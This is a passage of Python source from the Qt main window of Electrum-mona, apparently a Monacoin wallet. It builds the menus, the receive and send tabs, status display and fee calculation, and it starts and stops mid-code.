file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) if self.config.get('lightning'): add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) if self.config.get('lightning'): tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-mona.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum-mona.org")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Discord"), lambda: webopen("https://discord.gg/vWyjJ7r")) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('monacoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum-mona", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Electrum-mona's icon from oimo at askmona.") + "\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum-mona - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum-mona", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum-mona", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.lnworker: l = self.wallet.lnworker.get_balance() text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_channels_tab(self, wallet): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', 3600) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('On-chain')) self.create_invoice_button.setIcon(read_QIcon("monacoin.png")) self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.config.get('lightning'): self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=230) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_requests_label = QLabel(_('Incoming payments')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox_r = QHBoxLayout() hbox_r.addWidget(self.receive_qr) hbox_r.addWidget(self.receive_address_e) hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addLayout(hbox_r) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_request(self, key): self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', 3600) if is_lightning: payment_hash = self.wallet.lnworker.add_invoice(amount, message, expiry) key = bh2u(payment_hash) else: key = self.create_bitcoin_request(amount, message, expiry) self.address_list.update() self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') def create_bitcoin_request(self, amount, message, expiration): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, title, content): self.app.clipboard().setText(content) self.show_message(_("{} copied to clipboard").format(title)) #QToolTip.showText(QCursor.pos(), _("{} copied to clipboard").format(title), self.parent) def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def clear_receive_tab(self): self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) def update_receive_qr(self): uri = str(self.receive_address_e.text()) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) # note: 'addr' could be ln invoice or BIP21 URI try: uri = util.parse_URI(addr) except InvalidBitcoinURI: pass else: addr = uri.get('address') if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(self.amount_e.width()) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 3, 4) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 4, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 4, 1, 1, -1) self.set_pay_from([]) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(self.amount_e.width()) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(self.amount_e.width()) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit())) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) self.feecontrol_fields = QWidget() vbox_feecontrol = QVBoxLayout(self.feecontrol_fields) vbox_feecontrol.setContentsMargins(0, 0, 0, 0) vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_button) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.set_onchain(False) self.invoices_label = QLabel(_('Outgoing payments')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' if not self.is_onchain: return freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs = self.read_outputs() fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # 